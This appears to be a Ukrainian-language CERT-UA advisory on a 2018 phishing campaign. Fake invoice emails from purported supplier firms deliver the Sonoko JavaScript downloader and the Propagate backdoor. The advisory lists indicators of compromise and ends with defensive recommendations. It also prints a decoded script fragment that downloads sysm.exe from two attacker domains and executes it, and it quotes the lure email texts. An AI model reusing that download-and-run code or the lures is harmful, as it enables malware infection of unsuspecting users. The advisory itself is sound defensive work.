З 8.11.2018 по 27.11.2018 виявлено масову розсилку вірусу Sonoko за допомогою електронної пошти з подібними за змістом листами:
“Добрий день. Прошу прислать мне акт сверки за прошлую неделю.
Счета и выписку прилагаю.
С уважением
Бородавко Александр Владимирович
ТОВ Технік
(044) 312-8544”
з прикріпленим файлом “рахунки компания технік.zip”
або
“Приветствую.
Счета за ноябрь, просьба оплатить до конца недели.
С уважением Филипова Алла
Компания “Спец Строй Монтаж”
т. 0665718812”
з прикріпленим файлом “За текущий месяц рах.ф. Спецбуд.lzh”
Прикріплений архівний файл “рахунки компания технік.zip” містить файл “Компания.png” та архівний файл “рахунки компания технік.lzh”, який при активуванні запускає javascript “зг. дог рах. фак 708.js”, а для прикриття відкриває Word документ “07.11.18р список.docx”.
В результі виконання javascript “зг. дог рах. фак 708.js” завантажується виконувана програма sysm.exe, яка непомітна в системі, оскільки може не проявляти активність у випадку відсутності зв’язку з інтернетом. Основна діяльність sysm.exe, полягає в очікуванні команд з адрес, закодованих у коді в 16-річному форматі. Очікування команд реалізовано як сокет-сервер.
Скрипт “зг. дог рах. фак 708.js”, ідентифікований як Sonoko, та виконувана програма sysm.exe, ідентифікована як Propagate, небезпечні тим, що надають зловмисникам віддалений доступ до ураженого комп’ютера, змінюють мережеві налаштування, збирають історію браузера, можуть завантажувати інші шкідливі програми та змінювати значення реєстру.
Закодовані адреси є дещо цікавими, оскільки з адреси 5.8.0.2 забезпечується Freevpn service на nx0.ru, а 15.3.0.10 відноситься до HP-INTERNET мережі.
Індикатори компрометації (IOC):
%AppData%\Microsoft\Windows\Recent\ºзг. дог рах. фак 708 .js.lnk
%USERNAME%\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8NYNNL1S\sysm[1].exe
\Microsoft\Windows\Templates\966449.exe
або
%AppData%\Microsoft\Windows\Templates\223329.exe
%USERNAME%\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012018082720180828\index.dat
“HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable”
“HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet”
“HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect”
“HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet”
“HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect”
fortshritt@zp.ukrtel.net
a-prom@sm.ukrtel.net
966449.exe
223329.exe
districoperav.icu (188.225.10.43 (RU))
varanasiclick.ru (185.224.249.70 (RU))
Компания.png
md5 13841d586c5a5b1028bd93fb1bbdd8d1
рахунки компания технік.zip
md5 15afe96d35c44d0b4f662a79a81f6fec
рахунки компания технік.lzh
md5 bc290efdca6eeccd3a058b5ffb27af8f
https://www.virustotal.com/#/file/f217caf6ede8a63cdc9b6bcc9e754411da8f943885a9083904f2e4edf2ae4d32/detection
Trojan:Win32/Sonoko.A!ms
07.11.18р список.docx
md5 9283c127bfe493e8d943073032bc052b
зг. дог рах. фак 708.js
md5 7d63d6915374a527a01f3defae2e7f12
https://www.virustotal.com/#/file/fb9cfe3f02d645f1127c0d9133954a107afd4c99e09295800b85053be5c88c10/detection
Trojan:Win32/Sonoko.A!ms
./За текущий месяц рах.ф. Спецбуд.lzh
md5 df13205a3ff70c8eddbe4ccdaac03a4a
./рахунки ООО Спецстрой.xls.js
md5 f3591d95a5c9fe87bf7082a3053470e3
sysm.exe
e96c12188fca0652c36d4d0acc5a72f5
Propagate/Unwaders
Адресса отгрузки.xlsx
md5 858f6f7a781c47c925c0a5a87c3c4ad1
Частина розшифрованого змісту сткрипта:
“var Stream = new ActiveXObject(“ADODB.Stream”);
HTTP.Open(“GET”, “http://districoperav.icu/neifo/sysm.exe”, false); HTTP.Send(); if (HTTP.Status == 200) {
Stream.Open(); Stream.Type = 1; Stream.Write(HTTP.ResponseBody);
Stream.Position = 0; Stream.SaveToFile(path, 2);
Stream.Close(); sh.ShellExecute(path, “”, “”, “open”, 1); } else {
HTTP.Open(“GET”, “http://varanasiclick.ru/neifo/sysm.exe”, false); HTTP.Send(); if (HTTP.Status == 200) { “
Рекомендації CERT-UA:
– уникайте повідомлень вказаного та схожого змісту та застережіть персонал від запуску вкладень у підозрілих повідомленнях та файлів з виконуваними форматами ;
– зверніть увагу на фільтрування вхідних/вихідних інформаційних потоків, зокрема поштового веб-трафіку, налаштуйте захист від спаму та підробки адреси відправника за допомогою технологій DKIM, SPF, DMARC;
– не завантажуйте з невідомих джерел файли і не активуйте підозрілі виконувані файли;
– заблокуйте виконання файлів *.exe, *.jar, та *.js з директорій %TEMP%, %APPDATA%
– регулярно робіть резервні копії важливого програмного забезпечення та данних;
– оновити антивірусну базу та просканувати потенційно заражені системи;
– регулярно оновлюйте операційну систему та програмне забезпечення;
– перевірте журнальні файли на предмет наявності записів з зазначеними вище індикаторами;
– користуйтеся ліцензійним ПЗ, адже безкоштовні активатори та генератори ключів майже завжди містять в собі шкідливе ПЗ.